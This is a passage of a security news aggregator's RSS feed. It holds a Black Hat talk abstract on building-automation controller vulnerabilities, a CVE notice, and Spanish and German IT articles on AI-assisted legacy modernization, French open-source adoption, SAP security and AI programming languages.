<description><![CDATA[Author: Black Hat - Bewertung: 2x - Views:25 April 9, 2009, American Auto-Matrix (AAM) introduced AspectFT open web-enabled area controller for Building Automation. AspectFT (Facilitating Technology) comes in versions for various sized projects from a small building stand-alone solution to an Ent...]]></description>
<link>https://tsecurity.de/de/3629862/it-security-video/black-hat-europe-2025-hacking-smart-cities-one-building-at-a-time-a-city-of-a-thousand-zero-days/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629862/it-security-video/black-hat-europe-2025-hacking-smart-cities-one-building-at-a-time-a-city-of-a-thousand-zero-days/</guid>
<pubDate>Sat, 27 Jun 2026 18:18:02 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 2x - Views:25 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/m-5RSjZUl_4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>April 9, 2009, American Auto-Matrix (AAM) introduced AspectFT open web-enabled area controller for Building Automation. AspectFT (Facilitating Technology) comes in versions for various sized projects from a small building stand-alone solution to an Enterprise version for large scale building applications.Utilizing a Linux operating system, AspectFT uses a Java foundation to accomplish a number of building operation routines and control algorithms. Through utilization of this Facilitating Technology users can communicate to their BAS system through protocols such as BACnet IP and MS/TP, Modbus IP and RTU, and the American Auto-Matrix PUP protocol.<br />
<br />
In April 2024, Zero Science Lab identified over 800 vulnerabilities in the 18-year-old codebase dormant through two acquisitions. These controllers encompasses a wide array of locations and entities, spanning various sectors and regions worldwide, ranging from commercial buildings to correctional facilities, and their footprint across more than 30 countries and 220 cities, underscoring the global scope of the systems under investigation.<br />
<br />
In this presentation, we will disclose the vulnerabilities discovered that were left and never addressed because the vendor statement is that these devices were not meant for Internet connectivity despite the opposite marketing campaigns. We will reveal how ABB has started with silent fixes four years after aquisition and how it continued to not follow its own best practices and security disclosure policy.<br />
<br />
We will also show some sneaky backdoors and hidden "forgotten debugging functionalities" and interesting authentication issues. These vulnerabilities allow unauthenticated remote root exploits.<br />
<br />
Finally, the whole vendor planning and miscommunication will be presented with multiple fixed versions and unaddressed vulnerabilities in an attempt to downplay the criticality of this incident. Will also show some of the exposed smart giants that are prone to ICS attacks. The session is backed by a 160-page research paper.<br />
<br />
By: Gjoko Krstic  |  Offensive Security Researcher, Zero Science Lab<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/index.html#project-brainfog-hacking-smart-cities-one-building-at-a-time---a-city-of-a-thousand-zero-days-48113<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub - vichhka-git/renef-skills: Agent Skill (Claude Code + OpenCode) for operating renef.io — Android ARM64 dynamic instrumentation: hook native/Java, patch memory, trace syscalls, bypass SSL pinning/root detection; port Frida & GameGuardian scr]]></title>
<description><![CDATA[submitted by    /u/ResponsiblePlant8874   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3628884/reverse-engineering/github-vichhka-gitrenef-skills-agent-skill-claude-code-opencode-for-operating-renefio-android-arm64-dynamic-instrumentation-hook-nativejava-patch-memory-trace-syscalls-bypass-ssl-pinningroot-detection-port-frida-gameguardian-scr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628884/reverse-engineering/github-vichhka-gitrenef-skills-agent-skill-claude-code-opencode-for-operating-renefio-android-arm64-dynamic-instrumentation-hook-nativejava-patch-memory-trace-syscalls-bypass-ssl-pinningroot-detection-port-frida-gameguardian-scr/</guid>
<pubDate>Sat, 27 Jun 2026 04:23:57 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ResponsiblePlant8874"> /u/ResponsiblePlant8874 </a> <br> <span><a href="https://github.com/vichhka-git/renef-skills">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1ugnkv4/github_vichhkagitrenefskills_agent_skill_claude/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11919 | Wolfram Cloud 14.2 Java Virtual Machine /tmp/ privilege escalation (EUVD-2025-210362)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Wolfram Cloud 14.2. This issue affects some unknown processing of the file /tmp/ of the component Java Virtual Machine. Executing a manipulation can lead to privilege escalation.

This vulnerability is handled as CVE-2025-11919. Th...]]></description>
<link>https://tsecurity.de/de/3628329/sicherheitsluecken/cve-2025-11919-wolfram-cloud-142-java-virtual-machine-tmp-privilege-escalation-euvd-2025-210362/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628329/sicherheitsluecken/cve-2025-11919-wolfram-cloud-142-java-virtual-machine-tmp-privilege-escalation-euvd-2025-210362/</guid>
<pubDate>Fri, 26 Jun 2026 20:24:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/wolfram:cloud">Wolfram Cloud 14.2</a>. This issue affects some unknown processing of the file <em>/tmp/</em> of the component <em>Java Virtual Machine</em>. Executing a manipulation can lead to privilege escalation.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2025-11919">CVE-2025-11919</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizar el IT heredado con IA sin disparar el riesgo regulatorio]]></title>
<description><![CDATA[La IA está acelerando proyectos de modernización que antes exigían meses de análisis. Pero en las organizaciones más reguladas aparece enseguida una realidad incómoda: el riesgo ya no está en convertir el código, sino en demostrar que la versión nueva sigue haciendo exactamente lo que hacía la an...]]></description>
<link>https://tsecurity.de/de/3627343/it-security-nachrichten/modernizar-el-it-heredado-con-ia-sin-disparar-el-riesgo-regulatorio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627343/it-security-nachrichten/modernizar-el-it-heredado-con-ia-sin-disparar-el-riesgo-regulatorio/</guid>
<pubDate>Fri, 26 Jun 2026 14:21:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La IA está acelerando proyectos de modernización que antes exigían meses de análisis. Pero en las organizaciones más reguladas aparece enseguida una realidad incómoda: el riesgo ya no está en convertir el código, sino en demostrar que la versión nueva sigue haciendo exactamente lo que hacía la anterior.</p>



<p>Casi todos los comités de dirección han tomado la misma decisión este año: aplicar inteligencia artificial a sus sistemas. Y casi todos descubren lo mismo cuando bajan al detalle. La IA es fácil de añadir en la periferia —un <em>chatbot</em>, un copiloto, un cuadro de mando— y muy difícil de meter donde de verdad importa, que es el núcleo heredado. En banca, en seguros, en buena parte de la Administración, ese núcleo sigue siendo COBOL sobre mainframe, con décadas de parches encima y una documentación que, siendo generosos, es incompleta.</p>



<p>Ahí es exactamente donde se concentra el riesgo regulatorio. Y ahí es donde más proyectos descarrilan.</p>



<p>Llevo tres décadas en sectores regulados y el patrón se repite. El equipo de IT aborda la modernización como un problema de <em>delivery</em> —entregar rápido, cerrar tickets, pasar a producción— cuando en un sector supervisado el problema es de <em>compliance</em>. No se mide por lo que entregas, sino por lo que puedes defender. Cambiar ese chip es la mitad del trabajo.</p>



<h2 class="wp-block-heading">El espejismo del COBOL traducido</h2>



<p>La promesa es seductora. Hoy un modelo de lenguaje lee miles de líneas de COBOL, las documenta, las explica y propone una equivalencia en Java o en Python en una fracción del tiempo que costaría a un equipo humano. Funciona. Lo he visto acelerar análisis que antes llevaban semanas.</p>



<p>El problema no es el código. El problema son las reglas de negocio que nadie escribió nunca. En un proyecto de migración en un entorno bancario altamente regulado, el mayor riesgo no estaba en las rutinas, sino en una excepción de cálculo que llevaba quince años funcionando y que no figuraba en ningún documento: vivía solo en el código y en la cabeza de un analista ya jubilado. Cuando se le pide a un modelo que “traduzca” eso, no traduce: rellena el hueco con lo que estadísticamente parece correcto. Y lo hace con una seguridad impecable.</p>



<p>En un cuadro de mando, una alucinación es un error molesto. En el motor de cálculo de una entidad financiera es una incidencia de cumplimiento, una reclamación de cliente y, potencialmente, una sanción del supervisor.</p>



<p>La tentación, precisamente porque la herramienta es tan rápida, es saltarse la parte lenta: la reconstrucción de esa lógica con quien la conoce. Es la peor decisión posible. La velocidad de la IA seduce justo en el punto donde más caro sale equivocarse.</p>



<h2 class="wp-block-heading">Lo que el regulador espera (y lo que cambió en mayo)</h2>



<p><a href="https://www.computerworld.es/article/3804799/dora-entra-en-vigor-es-una-norma-disenada-por-tecnologos-y-dirigida-a-tecnologos.html">DORA </a>está en vigor desde enero de 2025 y es muy claro: resiliencia operativa, gestión de activos TIC, continuidad de negocio y control del riesgo de terceros. Modernizar el núcleo toca las cuatro cosas a la vez. NIS2 añade la capa de seguridad y notificación. Y el Reglamento de IA introduce su propio marco cuando el sistema que despliegas es de alto riesgo.</p>



<p>Aunque DORA, <a href="https://www.computerworld.es/article/4123680/nis2-del-diagnostico-al-reto-real-de-ejecutar-la-ciberseguridad.html">NIS2 </a>y el <a href="https://www.computerworld.es/article/4031130/analisis-del-reglamento-europeo-de-ia-un-ano-despues-de-su-entrada-en-vigor.html">Reglamento de IA</a> persiguen objetivos distintos, comparten una exigencia común: poder demostrar control, trazabilidad y responsabilidad sobre los sistemas que se despliegan. Esa es la pieza que conecta los tres marcos, y la que un proyecto de modernización tiene que proteger desde el primer día.</p>



<p>Aquí conviene deshacer un malentendido reciente. Con el acuerdo del <a href="https://data.europa.eu/en/news-events/news/eu-digital-omnibus-update-simplifying-europes-digital-rulebook" target="_blank" rel="nofollow">Digital Omnibus</a> de mayo de 2026, las obligaciones de alto riesgo del Anexo III se aplazan a diciembre de 2027. Muchos directivos han leído el titular —”la UE retrasa la Ley de IA”— como una tregua. Es una lectura peligrosa. Las obligaciones de transparencia siguen aplicándose en agosto de 2026, el marcado de contenido sintético llega en diciembre de 2026 y, sobre todo, el riesgo subyacente no se mueve ni un día. Una decisión automatizada errónea en 2026 sigue cayendo bajo el RGPD, bajo la normativa sectorial y bajo el supervisor de turno. El plazo se ha movido; la responsabilidad, no.</p>



<h2 class="wp-block-heading">Cómo hacerlo sin disparar el riesgo</h2>



<p>No tengo una fórmula mágica, pero sí cinco principios que aplico en cada proyecto de este tipo.</p>



<p><strong>Primero, inventariar antes de modernizar.</strong> No se puede asegurar ni migrar lo que no se ha mapeado. Activos, dependencias, flujos de datos: si no existe ese mapa, el primer entregable del proyecto es construirlo, no escribir código.</p>



<p><strong>Segundo, la IA propone, una persona valida.</strong> El modelo acelera el análisis y el primer borrador de la transformación. La regla de negocio crítica la confirma un ingeniero que entiende el negocio, no el modelo. Donde no haya quien la entienda, se reconstruye con el área de negocio antes de tocar nada.</p>



<p><strong>Tercero, trazabilidad de extremo a extremo.</strong> Cada transformación generada por IA debe quedar registrada: qué entró, qué salió, quién lo aprobó y por qué. Eso no es burocracia; es exactamente lo que el auditor pedirá, y es lo que convierte un cambio en defendible.</p>



<p><strong>Cuarto, cuidado con dónde va el código.</strong> Volcar fuentes del núcleo en un modelo externo es una transferencia de datos y un problema de confidencialidad antes que una cuestión técnica. DORA exige controlar al tercero; el RGPD, controlar el dato. Esa decisión se toma al principio del proyecto, no cuando ya está hecho.</p>



<p><strong>Quinto, gobernar el <em>shadow AI</em>.</strong> Si la organización no ofrece una vía segura para usar IA, los equipos la usarán igual, por su cuenta y sin control. La gobernanza no consiste en prohibir, sino en dar un camino habilitado.</p>



<h2 class="wp-block-heading">El liderazgo tecnológico ha cambiado</h2>



<p>En un sector regulado, el reto del CIO ya no consiste únicamente en modernizar los sistemas heredados, sino en hacerlo de una forma que resista el escrutinio de auditores, reguladores y comités de riesgo. Dirigir uno de estos proyectos ya no es coordinar entregas: es hacer que la transformación sea defendible. Significa decir que no a un atajo que ahorraría dos semanas, pero dejaría un hueco sin trazabilidad. Significa tratar la gobernanza como un acelerador —porque un cambio bien documentado se aprueba antes— y no es un freno.</p>



<p>La IA es una palanca extraordinaria para sacar a las organizaciones de su deuda técnica heredada. Pero en banca, seguros o Administración, la velocidad sin control no es una ventaja: es un pasivo que aflora en la primera inspección. Modernizar rápido puede ser una ventaja competitiva; modernizar con trazabilidad, control y capacidad de defensa es lo que la hace sostenible.</p>



<p>Por eso resumo así lo que llevo aprendido en estos años: una solución segura no es la más lenta ni la más cara. Es la que sobrevive a la primera auditoría.</p>



&gt;<figure class="wp-block-media-text__media"><img decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/jose-enrique-ibarra-ai-project-manager.webp?w=768" alt="José Enrique Ibarra, CIO interim y AI Project Manager" class="wp-image-4189993 size-full" loading="lazy" width="400px"></figure><div class="wp-block-media-text__content">
<p><strong><em><a href="https://joseenrique.es/" rel="nofollow">José Enrique Ibarra</a> es CIO interim y AI Project Manager, con tres décadas dirigiendo TI en sectores regulados —banca, seguros, energía y administración pública—. Su foco es gobernar la transformación digital y la adopción de IA bajo el Reglamento de IA, DORA, NIS2, RGPD, ISO 27001 y el ENS, de forma que resista el escrutinio de auditores y reguladores. Impulsa AI Forge, su iniciativa de IA aplicada. Reside en Almería. </em></strong></p>
</div></div>



<p></p>
</div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[La apuesta francesa por la soberanía digital: una plataforma de código abierto para 400.000 usuarios en el Ministerio de Educación]]></title>
<description><![CDATA[Francia está trabajando en reducir su dependencia de proveedores tecnológicos no europeos en el sector público, y para ello ha apostado por el software de código abierto, que está adquiriendo un papel cada vez más destacado en la región. 



Uno de los proyectos que está desplegando es Nuage, una...]]></description>
<link>https://tsecurity.de/de/3627242/it-nachrichten/la-apuesta-francesa-por-la-soberana-digital-una-plataforma-de-cdigo-abierto-para-400000-usuarios-en-el-ministerio-de-educacin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627242/it-nachrichten/la-apuesta-francesa-por-la-soberana-digital-una-plataforma-de-cdigo-abierto-para-400000-usuarios-en-el-ministerio-de-educacin/</guid>
<pubDate>Fri, 26 Jun 2026 13:47:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Francia está trabajando en reducir su dependencia de proveedores tecnológicos no europeos en el sector público, y para ello ha apostado por el software de código abierto, que está adquiriendo un papel cada vez más destacado en la región. </p>



<p>Uno de los proyectos que está desplegando es Nuage, una plataforma de almacenamiento e intercambio de archivos desarrollada por el Ministerio de Educación Nacional para docentes, personal administrativo y otros empleados. Aunque está dirigida a los 1,2 millones de trabajadores del Ministerio, actualmente cuenta con 400.000 cuentas activas, y alrededor de dos tercios de los usuarios acceden al servicio cada semana.</p>



<p>Cada usuario dispone de 100 GB de almacenamiento para documentos, PDF, vídeos e imágenes, aunque el uso medio se sitúa en torno a los 3 GB. Además, la plataforma permite compartir y editar documentos de forma colaborativa.</p>



<h2 class="wp-block-heading">El código abierto como modelo para otros</h2>



<p>El proyecto del Ministerio es un ejemplo de cómo el software de código abierto puede utilizarse a gran escala y servir de modelo para otras organizaciones que buscan reforzar su soberanía digital. El interés por este enfoque ha aumentado en los últimos meses debido a las tensiones geopolíticas y comerciales, así como al creciente temor en Europa de que la Administración Trump pueda restringir de forma repentina el acceso a determinadas tecnologías.</p>



<p>Para la administración francesa, Nuage permite al Ministerio mantener el control sobre los datos sensibles relacionados con los estudiantes que almacenan los docentes, explica Benoît Piédallu, responsable nacional de proyectos de servicios digitales del Ministerio de Educación Nacional de Francia.</p>



<p>“No queríamos que estos datos fueran a Estados Unidos, a Microsoft o a otros sistemas similares. Para nosotros era importante que permanecieran en nuestras propias instalaciones”, afirma Piédallu.</p>



<p>El coste también ha sido un factor determinante. Según Piédallu, el Ministerio puede destinar aproximadamente 10 euros por usuario al año al proyecto. “Mi presupuesto para la plataforma es inferior a dos millones de euros anuales, por lo que el precio es, por supuesto, una cuestión muy importante”, señala.</p>



<p>El equipo de servicios digitales del Ministerio ha sido responsable tanto del diseño como de la puesta en marcha de Nuage. Los trabajos se desarrollaron desde el despliegue inicial en 2020 hasta el lanzamiento de la versión definitiva en 2022.</p>



<p>“El principal reto de desplegar una plataforma de código abierto es que tenemos que hacerlo todo nosotros mismos”, explica, en referencia a la gestión de máquinas virtuales, la instalación de Linux Debian y la configuración del entorno. “Necesitamos administrar toda la infraestructura y, por supuesto, instalar y configurar Nextcloud”.</p>



<p>El Ministerio cuenta con dos empleados dedicados a la gestión de la plataforma de almacenamiento y un tercero responsable de la infraestructura. Nuage está alojada en dos centros de datos estatales: uno cerca de París y otro en el sur del país, próximo a los Pirineos.</p>



<p>Las funciones de almacenamiento y sincronización de archivos se basan en Nextcloud Files, desarrollado por la empresa alemana Nextcloud. Además, Nuage incorpora un editor documental basado en Nextcloud Office, que utiliza tecnología de código abierto de Collabora.</p>



<figure class="wp-block-pullquote"><blockquote><p><em><strong>El Gobierno francés ha anunciado planes para sustituir Windows por Linux en determinadas áreas de la Administración pública</strong></em></p></blockquote></figure>



<h2 class="wp-block-heading">La adopción sigue creciendo</h2>



<p>Piédallu considera que la elevada adopción del servicio demuestra su éxito. De los 400.000 usuarios activos, alrededor de 80.000 utilizan el cliente de sincronización de archivos en el escritorio. En total, Nuage almacena 570 millones de documentos y 1,2 petabytes de datos.</p>



<p>Este nivel de implantación se ha logrado prácticamente sin campañas internas de promoción. “No hemos realizado ninguna comunicación nacional importante para animar a los usuarios a utilizar el servicio ni para informarles de que disponen de 100 GB de almacenamiento”, explica.</p>



<p>A pesar de ello, la adopción sigue aumentando, hasta el punto de que cada mes es necesario incorporar unos 40 terabytes adicionales de capacidad de almacenamiento para atender la demanda. “Tenemos un crecimiento muy lineal. Es increíble verlo”, afirma.</p>



<p>Sin embargo, el aumento de los costes del hardware de almacenamiento ha llevado al Ministerio a intentar moderar el ritmo de crecimiento para evitar mayores inversiones en infraestructura. “Si mañana hiciera una campaña de comunicación, aceleraría el uso, y sé que tengo un límite en mi centro de datos”.</p>



<p>Incluso sin impulsar activamente la adopción, el Ministerio prevé alcanzar 600.000 usuarios antes de que finalice el año.</p>



<p>Aunque el equipo de servicios digitales no dispone de una visibilidad completa sobre la percepción de la plataforma, Piédallu asegura que la respuesta es positiva. El sistema de almacenamiento y sincronización funciona de manera prácticamente transparente para los usuarios y ofrece un rendimiento estable, salvo algunos problemas ocasionales de sincronización. “Están muy satisfechos. No hacen comparaciones con Google Drive o OneDrive; simplemente funciona”.</p>



<p>La recepción de la <em>suite </em>ofimática basada en Collabora, sin embargo, ha sido menos favorable, en parte porque su interfaz resulta poco familiar para muchos usuarios. “Cuando quieren editar documentos o trabajar con una hoja de cálculo, esperan que funcione exactamente igual que lo que ya conocen. Si utilizan Microsoft Office, quieren las mismas opciones y la misma experiencia”.</p>



<p>Las administraciones locales y los distritos escolares no están obligados a utilizar Nuage; pueden optar por desplegar la plataforma o recurrir a software propietario. De hecho, herramientas como Microsoft SharePoint y la suite Microsoft Office siguen utilizándose ampliamente, aunque no existen cifras oficiales sobre su nivel de uso. El Ministerio, por ejemplo, destina alrededor de 2,5 millones de euros al año a licencias de Windows para unos 50.000 dispositivos.</p>



<h2 class="wp-block-heading">La búsqueda de independencia tecnológica</h2>



<p>La soberanía digital se ha convertido en una prioridad creciente tanto para el Ministerio como para el conjunto del sector público francés, según Piédallu. “Hace unos años, el software libre y los bienes digitales comunes eran la prioridad; ahora lo es la soberanía digital: desplegar herramientas soberanas que podamos operar nosotros mismos y que no incluyan mecanismos de interrupción remota (‘kill switch’), entre otras cosas”.</p>



<p>Añade que se trata de una línea estratégica impulsada tanto desde la Administración como desde el ámbito político. Nuage es solo una de las múltiples iniciativas de código abierto en marcha en el sector público francés. Entre otras destaca LaSuite, una suite de productividad y colaboración desarrollada por la Dirección Interministerial de Asuntos Digitales (DINUM), que incluye servicios como la aplicación de mensajería Tchap y la plataforma de videoconferencia Visio.</p>



<p>Asimismo, el Gobierno francés ha anunciado planes para sustituir Windows por Linux en determinadas áreas de la Administración pública. Piédallu considera que las organizaciones públicas que estudian adoptar software de código abierto deberían apoyarse en la experiencia de otras entidades que ya han recorrido ese camino. También cree que muchos directivos sobreestiman la dificultad de abandonar tecnologías consolidadas.</p>



<p>“La mayoría de los responsables de decisión creen que será muy difícil. Evidentemente, hay trabajo por hacer para gestionar el cambio, ayudar a las personas y asegurarse de que todo está bien planificado”, afirma. “Pero al final es posible. Es algo que podemos hacer”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Casi nueve de cada diez empresas españolas usuarias de SAP están desprotegidas ante las nuevas amenazas sobre el ERP]]></title>
<description><![CDATA[El estudio ‘Ciberseguridad en SAP 2026’, realizado por la consultora española Seidor en el segundo trimestre de 2026, mediante encuestas a responsables de tecnología, ciberseguridad y riesgo de medio centenar de organizaciones españolas usuarias de SAP con una facturación superior a 100 millones ...]]></description>
<link>https://tsecurity.de/de/3626613/it-security-nachrichten/casi-nueve-de-cada-diez-empresas-espaolas-usuarias-de-sap-estn-desprotegidas-ante-las-nuevas-amenazas-sobre-el-erp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626613/it-security-nachrichten/casi-nueve-de-cada-diez-empresas-espaolas-usuarias-de-sap-estn-desprotegidas-ante-las-nuevas-amenazas-sobre-el-erp/</guid>
<pubDate>Fri, 26 Jun 2026 09:35:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>El estudio ‘Ciberseguridad en SAP 2026’, realizado por la consultora española Seidor en el segundo trimestre de 2026, mediante encuestas a responsables de tecnología, ciberseguridad y riesgo de medio centenar de organizaciones españolas usuarias de SAP con una facturación superior a 100 millones de euros, muestra hasta qué punto las empresas están preparadas para una nueva tipología de riesgos, menos visible que los ataques tradicionales.</p>



<p>En concreto, el informe revela que el 88% de las empresas usuarias de SAP están desprotegidas ante las nuevas amenazas sobre el ERP, el sistema mediante el cual se gestionan procesos críticos como pagos, proveedores, pedidos, precios, información financiera o datos de clientes y productos.</p>



<p>Esta desprotección, apunta el informe, “no se explica por una falta de vigilancia”, pues el 90% de las organizaciones analizadas afirma vigilar su entorno SAP de forma permanente. La brecha, señalan los responsables del estudio, aparece en otro punto: “Solo el 12% declara capacidad para detectar a tiempo fraudes o manipulaciones cuando esas amenazas se presentan como una actividad aparentemente legítima dentro del propio ERP, en lugar de como un ataque evidente”, relata.</p>



<h2 class="wp-block-heading">El eslabón más débil: la identidad digital</h2>



<p>El informe apunta que las nuevas amenazas sobre SAP se diferencian por su capacidad para actuar dentro de la operativa diaria. En este sentido, pueden sostenerse sobre usuarios aparentemente válidos, permisos existentes, cambios en datos críticos o peticiones que parecen proceder de una identidad legítima. “Por eso, el riesgo ya no se limita a accesos no autorizados o acciones bloqueadas por el sistema, sino que puede aparecer en operaciones permitidas que no responden al contexto del negocio”, indica el informe.</p>



<p>Una dificultad que se agrava con la inteligencia artificial ofensiva, que es percibida por el 66% de las organizaciones como un riesgo “relevante o muy importante” para su entorno SAP, al hacer más verosímiles los intentos de suplantación, fraude o manipulación. “En este escenario, la defensa del ERP exige reforzar la gobernanza de la identidad digital: quién accede, con qué permisos, qué operación ejecuta y si esa acción tiene sentido dentro del contexto de negocio”, recomienda el equipo de Seidor.</p>



<p>Por otro lado, el informe subraya que la protección del ERP ya no puede depender solo de alertas individuales. “Las empresas necesitan una lectura más completa de la identidad, los privilegios y la actividad dentro de SAP: quién accede, qué permiso utiliza, qué dato modifica, qué operación ejecuta y en qué momento lo hace”, reza el estudio.</p>



<h2 class="wp-block-heading">Aumento de la inversión en seguridad SAP</h2>



<p>La buena noticia es que el 74% de las organizaciones consultadas dicen que aumentarán su inversión en ciberseguridad SAP en los próximos 12 meses, un dato que, según los autores del informe “confirma que las empresas son conscientes del riesgo”. El reto, según estos, está “en dirigir bien esa inversión: aumentar el presupuesto no garantiza por sí solo una mayor protección si no se orienta a las capacidades adecuadas.</p>



<p>Las prioridades, según los autores del informe, deben ser “reforzar el control sobre la identidad digital y los privilegios, conectar la información de SAP con la seguridad general de la empresa, detectar patrones concretos de fraude o manipulación y poder reconstruir un incidente con evidencias claras”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Künstliche Intelligenz programmieren: Die besten Coding-Sprachen für KI]]></title>
<description><![CDATA[Wenn es darum geht, Künstliche Intelligenz zu programmieren, stehen Ihnen diverse Optionen zur Wahl. Wir zeigen Ihnen die besten KI-Programmiersprachen.
					Foto: Connect world – shutterstock.com




Künstliche Intelligenz (KI) eröffnet Softwareentwicklern völlig neue Möglichkeiten: Mit Hilfe vo...]]></description>
<link>https://tsecurity.de/de/3626228/it-security-nachrichten/kuenstliche-intelligenz-programmieren-die-besten-coding-sprachen-fuer-ki/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626228/it-security-nachrichten/kuenstliche-intelligenz-programmieren-die-besten-coding-sprachen-fuer-ki/</guid>
<pubDate>Fri, 26 Jun 2026 05:22:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Wenn es darum geht, Künstliche Intelligenz zu programmieren, stehen Ihnen diverse Optionen zur Wahl. Wir zeigen Ihnen die besten KI-Programmiersprachen." title="Wenn es darum geht, Künstliche Intelligenz zu programmieren, stehen Ihnen diverse Optionen zur Wahl. Wir zeigen Ihnen die besten KI-Programmiersprachen." src="https://images.computerwoche.de/bdb/3284310/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Wenn es darum geht, Künstliche Intelligenz zu programmieren, stehen Ihnen diverse Optionen zur Wahl. Wir zeigen Ihnen die besten KI-Programmiersprachen.</p></figcaption></figure><p class="imageCredit">
					Foto: Connect world – shutterstock.com</p></div>




<p><a href="https://www.computerwoche.de/article/2769837/was-sie-zum-thema-ki-wissen-muessen.html" title="Künstliche Intelligenz" target="_blank">Künstliche Intelligenz</a> (KI) eröffnet Softwareentwicklern völlig neue Möglichkeiten: Mit Hilfe von <a href="https://www.computerwoche.de/article/2789087/noch-viel-zu-tun-bei-ki-und-ml.html" title="Machine und Deep Learning" target="_blank">Machine und Deep Learning</a> lassen sich bessere Nutzerprofile und Empfehlungen, ein höherer Personalisierungsgrad, smartere Suchoptionen oder intelligentere Interfaces realisieren. Dabei stellt sich unweigerlich die Frage, welche Programmiersprache dafür zum Einsatz kommen soll. Die Anforderungen, denen eine KI-Coding-Sprache genügen muss, sind vielfältig: eine Vielzahl von Machine- und Deep-Learning-Bibliotheken sollten genauso vorhanden sein wie eine performante Laufzeitumgebung, ausgiebiger Tool Support, eine große Entwickler-Community und ein gesundes Ökosystem.</p>



<p>Trotzdem dieser Anforderungskatalog umfassend ist, stehen Ihnen einige gute Optionen zur Wahl, wenn es darum geht, Künstliche Intelligenz zu <a href="https://www.computerwoche.de/article/2813209/11-wege-ihre-softwareentwicklung-neu-zu-definieren.html" title="programmieren" target="_blank">programmieren</a>. Wir zeigen Ihnen eine Auswahl der besten KI-Programmiersprachen.</p>



<h2 class="wp-block-heading">Python</h2>



<p>Wenn Sie als Developer mit künstlicher Intelligenz arbeiten, führt mit an Sicherheit grenzender Wahrscheinlichkeit kein Weg an <a href="https://www.cowo.de/a/3548847" title="Python" target="_blank" rel="noopener">Python</a> vorbei. Inzwischen unterstützen auch so gut wie alle gängigen Bibliotheken Python 3.x – die Zeiten, in denen die Umstellung von Python 2.x auf 3.x Kompatibilitätsprobleme mit sich brachte, sind so gut wie vorbei. Mit anderen Worten: Sie können nun endlich auch in der Praxis von den zahlreichen neuen Features von Python 3.x profitieren. Was nicht heißen soll, dass die packaging-Hürden bei <a href="https://www.computerwoche.de/article/2762025/python-lernen-leicht-gemacht.html" title="Python" target="_blank">Python</a> überhaupt keine Rolle mehr spielen – das Gros der Probleme lässt sich aber mit Hilfe von Anaconda umschiffen. Nichtsdestotrotz wäre es zu begrüßen, wenn die Python Community endlich voll und ganz von diesen Hürden befreit würde.</p>



